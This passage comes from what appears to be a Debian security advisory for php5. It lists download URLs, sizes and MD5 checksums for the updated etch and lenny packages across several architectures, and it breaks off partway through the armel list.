http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 15648 ced51c3a5f31837bb62ad17fd7a2894c http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 342248 4009fa1cf603d4a96982e3c06a07a5c6 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 216456 7071a61700d419350263c8f3897328ae http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 11260 3df964ea3d0d03910d839300a4e91913 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 23372 6da38108210252adf9863ebd835be800 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 49414 c7a18e0a8c0345e58e2fc44dd0f760cc http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 32308 926993e30e6c169d1ede6f3546bf3f31 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 12428 50b1b56f30669bbbb93438f7bcad824e http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 18464 ca647d8e2bfc76d1773c443d8c8bed96 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 2361012 edc3f684db523093caabf7547038683d http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 17258 815bd4b979c29f2fc83e00a853cdfb01 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 6356 5b03d489a708681fe4d728248da62a2e http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 13756 ca5f1c20db873df06f6a012c79525e8e http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 10118 a2567363af57dfcf9691d80c7c6e6143 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 2443080 1820dff09e7652b38b810be002100499 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 36010 44be1e0e4ef839432e945dc9969f9ac7 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 26794 0bd9abc2e4d221a353d92e580d3d1969 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 36486 181249f78ab7032bb9a5d85be3d57da5 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 37012 e7bdea05d06b9f9cbf943751cdce46b0 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 37722 ff95f84599c1bc8acb066b63a4d16fb9 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 2395642 f25db1183bd763f156a553d1ae4da610 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 14748 bb755f096fb464b8a892d4c652835a69 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 219940 2b6799cef3190db6db34adebb4848fda http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 20244 43fecbc5a5d7b345d495bcae3252764f http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 6742 b99c0c45318e6b228c1ba5dbe089a471 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 38054 25cf7ad11527dae03e1ef3604c6bd8da http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 18458 7fa7c42b48c2392876927ca58435cb0e http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 53962 a3f8f8346f9fa93b9d5c029e02f12456 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 70316 070e13b75e1cba8bd8f89ae27a1c8e6b http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 19180 ec55dabf5357584f8e25be0042c7844f http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 4750566 91664501656bce158df70eb341f6613a http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 344546 dde478197a7294ab3aaf30bff3e171c2 http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 2442670 61166501966bb8fa04e27b4bc7316432 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_powerpc.deb Size/MD5 checksum: 12702 76cc7091c6db71ef9dd9e69ce0b00579 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 221368 a6e658b97893d8b77ccaaf04e35e42bd http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 9194 fa30b60689f9aa411a6d30eea244c622 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 4894702 977e1d064ace840b45e1a73f27ab4a4a http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 13404 39e1e3f533d15d5a408bb358df8798b1 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 36168 6cc918284ec969691d556523703fea66 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 56330 f6fc9ed26260838fe829b4d89fcd14e0 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 18182 f4a9628e3fe287545907af24cfcc849a http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 19326 382049adce2f0bd419ebc82a3526e596 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 72592 337a5ff80194823a1181c3875ae8cf00 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 11960 86d90439ba65beaba664bf01646e26eb http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 19582 96cf40da9542bee18aa4906711f27a7f http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 2536368 9e6c641dbf7764b368672e9c8f3c2e08 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 13444 138cf346d0b753e15ef936ec889dd1e8 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 25040 ef129928ee072d2370e5d9534353a8af http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 5132 3f5a63cbafcecf9942c4e474bffa8c67 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 5478 8d4952bc62e003074e418b6824301c2a http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 2465860 c1f7086621fe0756f8e5956554a25fee http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 37188 cfcd07d6ec12fe61e457b82dff850e49 http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 2535908 87d8dd0d86f48e162e4b8710bb8eaf60 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 40524 7c3cc8e5020d14d2c2fc84da6eafe24e http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 342210 a491997e72607223b8d7c5cfdde973fa http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 39198 062f74d7158c086afe3c8436f7a1cdd0 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_s390.deb Size/MD5 checksum: 37252 ba27d42fb587566e370c2d1bc536e9f4 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 2333980 dd28760adfbc4ca01a5f0ca5db64989f http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 10774 bb3753599a2ae5574d011f2cc11740d4 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 62210 b66be0f1e76e37489333dc91de9744d6 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 16586 e0b266c39c36a5e667cca229f43a28eb http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 4525670 258ab01f6bfc79f2bd4d825cb1145a9a http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 8276 4e7da0ff28b78901a191cf9425362681 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 24652 7ea91609c3f642a21513ee451d405234 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 11678 6c734dee3e19e59242719233f61aec5f http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 33304 5683a3c91dba8aa7d19dd976119f795b http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 2281860 31210fbdbcf3c1d3040626b162587e7a http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 32592 b0dc42cc6cc8fd6990b3c7e548b91095 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 17458 d349438d7a88740807d029692c329b37 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 4872 81f03284e1f322a6535c31c29fa3f665 http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 2333472 0857cd1d3b2795ed7acd0300cbc840b4 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 34914 28f290db6e698eb55ac22a356e37e542 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 33086 4b2022444cd5a03142f9976a36e45076 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 31526 76a67289d992d7df2e0f831f8f76a271 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 215706 5350f154ebe757f7644cc6c7d16401f7 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 16244 c653f76328aeceea738bb74d31b44130 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 12630 d33844a8e4307574c0de0f91e6d1b1e0 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 342314 c9b88048c81be7f342f8d58eb4809bbe http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 47952 8ba01a246dbf5197ea4557ed702eabbc http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_sparc.deb Size/MD5 checksum: 4654 5f120de17b90a1a60dff8cb5c73c600e Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1-1+lenny3.dsc Size/MD5 checksum: 2520 e865d9ad2851dcf9f83d71c148423c84 http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1.orig.tar.gz Size/MD5 checksum: 12173741 b80fcee38363f031229368ceff8ced58 http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1-1+lenny3.diff.gz Size/MD5 checksum: 160126 9a0f8b8a480b0d95ddecd7f82593e108 Architecture independent packages: http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1-1+lenny3_all.deb Size/MD5 checksum: 1078 68c3a9e139c81103fce02940c5e1951e http://security.debian.org/pool/updates/main/p/php5/php-pear_5.2.6.dfsg.1-1+lenny3_all.deb Size/MD5 checksum: 334564 b4c42ff4056be09e0cf2102445518736 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 71712 b820d53d822b0ddb00d4928e6e232e9a http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 8928 b7a52eb73120fc89a282195829318789 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 13802 7bcafa8841dc31e86a8a8d94ab4d04f3 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 19676 9fdc3bed1d775d784a1547c7a3df78ba http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 12334 aee151fe4f6a3a7061f21f4ff031f31a http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 17670 b3d36aa88ea83e03ccaf6c92f85e4498 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 5080 fdf892faed973e797cffdc5571b1042a http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 2674408 e4457b886974643f04d52341717827da http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 15822 66a7f1a85356624f5f9772d7e31bac1c http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 37514 c3627c5319d269416dfe8b0bb97338fb http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 25010 13a28b75ccfe9c47ae1661d7a8fda542 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 5163370 cdd01a0fea962714adab1154d7b41dab http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 27608 d833a8cc9ba83da449f1a2373c85f3fc http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 5412 64f5a28d948627e6b03d8a154259f849 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 37168 4dd05e75f1d5780fe8de13d9c07d7a9d http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 14060 df8db38d9a072e2ced4ea19226ac1168 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 19512066 1efdd53c61a6cf28dce0543462728efc http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 2673040 787a29a967a3e6458e1dcfcaa3ef7608 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 39406 0c83e84941cac2840ae761c7742e915f http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 2598434 1a7a352b998991eb506d136406fc4da1 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 36650 2bf015e1dce330ae3bd3645a2454540c http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 362786 1175ddaf9788bfa1a1fb2e5f04396761 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 368398 06e35e7ffff7b3c854f09b96feb4b181 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 57878 1e48fc0c9f2b32c2652d6bafca2c6a9d http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_alpha.deb Size/MD5 checksum: 41632 593a7515ba3746cdd4de8484eea1fe65 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 5428 6ee59ecf0e008a8a230e28f907116d4f http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 9474 b0ef7faa0cc3f1cb1c3fb41b5ce05c30 http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 48452 3ed659cf2aa7e178bfe049a5d5958f6a http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 366086 bdb6555ef6bfba1d4d3a4466d5727325 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 8300332 b282cbf7b62b897417eac1d3be14ef87 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 14190 62126774d34edcb24786676203fb08bd http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 2614610 b309b2993a0aba0f495c57aaa909a274 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 40912 94acf21a9170d6246259be00fb877386 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 37046 baf59ec2824c389395a04a29d6dc8909 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 37864 caecc5e8c8c5c0d4e0ed964365db2f92 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 12350 df28abc45cbd11af84d28ac91b930f97 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 13940 2357126080c8576f77095246abf9f37d http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 2563068 80d0fc43130775d658af3f87ecea644f http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 28064 85097f2998fd151d955f572964e5d422 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 25260 ff405813e6b71d4b90611eec50e96a8f http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 5100 d0ea290a8c385c6aba602d28e4d2cd39 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 367858 5b8e49b3b892569219baf60a896dde95 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 56882 99560785fc2489866a1cdc32ba3df138 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 18134 5c8e5ab6ac2f0c482222787bd7eb29c5 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 73714 4aae04e66b706291291e2b03ebcea83f http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 5083216 428f888c54d8a5ebf783b6345d629a3f http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 2615884 834747cef1119734261264d24094c5a2 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 38098 00258c838c19400ec990654cee6f7a96 http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 16524 9b3ecd5606fa66b221b111b821018e54 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 20160 b9f10192699c5c6a2613f595f5c40325 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_amd64.deb Size/MD5 checksum: 39780 7a8fe62fdcd1b72a4be02ee2507b292b arm architecture (ARM) http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 34008 0e99ac4c79e39657dbb2c47a851f0f6c http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 18038 7e059b3bc36ab4ffa3f5363c71985df4 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 11272 8b616635d92a42f38610e30cb6362782 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 24974 ef18b9f5b910ad90e4edf26e75277b26 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 2439774 3869ac0307bd7d203779109ac4991326 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 34482 573d1c55bda69385638ce10badad25c3 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 12458106 bb57e14d56b887aab4e66890f1d19d09 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 16064 33dfc57163bf769b05d0ec6541a257c7 http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 13866 5718d2d7f7e467d45f2506025206b617 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 12788 d24946f45e393af9591cb22ce59aa2b3 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 32766 1e377a317fa18c8c7427be084496af28 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 12488 86cf842dd35e7d39399f56aac794de2c http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 365138 9d1e080fbfabc0a17330fa131f21487f http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 4968 bf8f16ad08ae817b944f373c1b5cfdb1 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 4748 94f08add435f9c12b56d386922fb6cc2 http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 8370 3a1d6ce866160b153138fe842b0e6979 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 23664 ed6b0f4ccfe9ae0db5f4568279d6bf66 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 34234 6d90436cd54964865a27f9582b1394c6 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 51216 c7e5d4cf5b10261795d401a0c226cb2b http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 2446838 fb70395a38d624d9023d85460298233c http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 63752 806a32cb00b5d46ba4e8ec1be57b4572 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 34782 0c55c055992eeb24fe195c3cc9d0b86c http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 365240 ac5ef3bbd0dfa530fef524bb42420336 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 4847034 5a36b5886c3882bb84dabd49ceefbe7f http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_arm.deb Size/MD5 checksum: 2448174 75cde1148efded71e752a643b57e6cd7 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 2441786 2568cc45c67332c8a67a77f211469d8e http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 36576 57367a49ce5c6e5f851fadd506465bf6 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 2448124 0f0991ffef0cd003d4a42bedc7cdd07e http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_armel.deb 